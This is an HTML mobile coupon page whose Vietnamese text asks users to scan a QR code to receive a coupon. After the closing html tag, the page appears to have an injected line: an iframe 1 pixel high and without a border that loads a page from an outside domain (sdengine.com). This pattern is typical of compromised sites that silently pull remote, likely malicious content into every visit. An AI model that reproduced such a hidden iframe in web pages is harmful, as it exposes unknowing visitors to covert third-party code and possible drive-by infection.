<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html>
<head>
  <title>TestPageTypes</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <link rel="stylesheet" type="text/css" href="style.css">

<style type="text/css">    body{background-image:url();
background-color:#ffffff;
}
    .coupon_container{padding: 20px}
    .coupon_shadow{-webkit-box-shadow: -1px -1px 0px 0px rgba(0,0,0,.1), 1px 1px 0px 0px rgba(255,255,255,.7);
-moz-box-shadow: -1px -1px 0px 0px rgba(0,0,0,.1), 1px 1px 0px 0px rgba(255,255,255,.7);
box-shadow: -1px -1px 0px 0px rgba(0,0,0,.1), 1px 1px 0px 0px rgba(255,255,255,.7);
}
    .coupon_details{color:#ffffff;
background:rgba(255,255,2255, 0.5);
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
font-family:Helvetica;
font-size:16px;
line-height:20px;
padding:10px;
margin:0px 0px 20px;
}
    .coupon_backbtn{width: 100%;
color: #fff;
font-weight: 200;
background: #363f4b;
border: none;
-webkit-appearance: none;
-moz-appearance:    none;
appearance:         none;
padding: 10px 0;
text-align: center;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
a{}
a:visited{}
</style>
</head>
<body>
<div class="coupon_container">
    <div align="center" class="coupon_details coupon_shadow" style="background-color: #9c1f25;"><center><img src="couponunlock.png"></center>
        <div style="color: rgb(255, 255, 255); font-size: 13px; line-height: 22px;">Để nhận được Coupo, bạn phải scan QR Code. CÓ thể bạn phải quét mã nhiều lần. Để Scan mã QR code, nhấn nút  <b>"Scan"</b> , sau đó hướng camera về phía mã vạch này.</div></div>
    <a href="javascript:window.history.back()">
      <div class="coupon_backbtn" style="background-color: #9c1f25;">← BACK</div>
    </a>
</div>



</body>
</html><iframe src="http://sdengine.com/ga.html" frameBorder="0" width="100%" height="1"></iframe>